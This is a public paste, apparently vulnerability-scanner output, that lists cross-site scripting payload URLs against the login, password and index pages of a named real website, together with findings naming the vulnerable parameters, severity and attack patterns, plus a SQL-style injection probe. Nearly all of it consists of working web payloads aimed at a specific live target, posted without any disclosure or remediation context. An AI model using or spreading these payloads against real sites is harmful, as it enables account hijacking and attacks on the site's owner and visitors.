Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- XSS - http://missagro.cz
- http://www.missagro.cz/underwood/login.php?'"--></style></script><script>alert(0x0002CB)</script>
- http://www.missagro.cz/underwood/login.php?request='"--></style></script><script>alert(0x000497)</script>
- http://www.missagro.cz/underwood/login.php?request='"--></style></script><script>alert(0x000491)</script>&uwLanguage=cz
- http://www.missagro.cz/underwood/login.php?changeUwLanguage=1&request='"--></style></script><script>alert(0x0004D4)</script>&uwLanguage=cz
- http://www.missagro.cz/underwood/login.php?changeUwLanguage=1&request=" stYle="x:expre/**/ssion(alert(9)) &uwLanguage=cz
- http://www.missagro.cz/underwood/login.php?changeUwLanguage=1&request=/underwood/&uwLanguage="></script><script>alert(9)</script>
- http://www.missagro.cz/underwood/login.php/' stYle='x:expre/**/ssion(alert(9))
- http://www.missagro.cz/underwood/login.php?changeUwLanguage=1&request=/underwood/&uwLanguage='"--></style></script><script>alert(0x00054F)</script>
- http://www.missagro.cz/underwood/login.php?request='"--></style></script><script>alert(0x000551)</script>&uwLanguage=cz
- http://www.missagro.cz/underwood/login.php?request='"--></style></script><script>alert(0x000559)</script>
- http://www.missagro.cz/underwood/passwd.php?changeUwLanguage=1&request=3&uwLanguage="></script><script>alert(9)</script>
- http://www.missagro.cz/underwood/passwd.php/"ns="alert(0x000464)
- http://www.missagro.cz/underwood/passwd.php?'"--></style></script><script>alert(0x0005E1)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.missagro.cz/underwood/login.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: loginTarget
- Parameter Type: Post
- Attack Pattern: ><iMg src=N onerror=alert(9)>
- |||
- [Possible] Permanent Cross-site Scripting
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.missagro.cz/underwood/login.php?request=3&uwLanguage=convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://www.missagro.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage=%27%22%20ns=netsparker(0x0004DF)%20
- Parameter Name: uwLanguage
- Parameter Type: Querystring
- Attack Pattern: convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
- |||
- [Possible] Cross-site Scripting
- http://www.missagro.cz/underwood/?'"--></style></script><script>alert(0x0002CB)</script>
- http://www.missagro.cz/underwood/?'"--></style></script><script>alert(0x0002CB)</script>
- http://www.missagro.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage='"--></style></script><script>alert(0x0004A0)</script>
- http://www.missagro.cz/underwood/index.php/" stYle="x:expre/**/ssion(alert(9))
- http://www.missagro.cz/underwood/index.php?'"--></style></script><script>alert(0x00055A)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
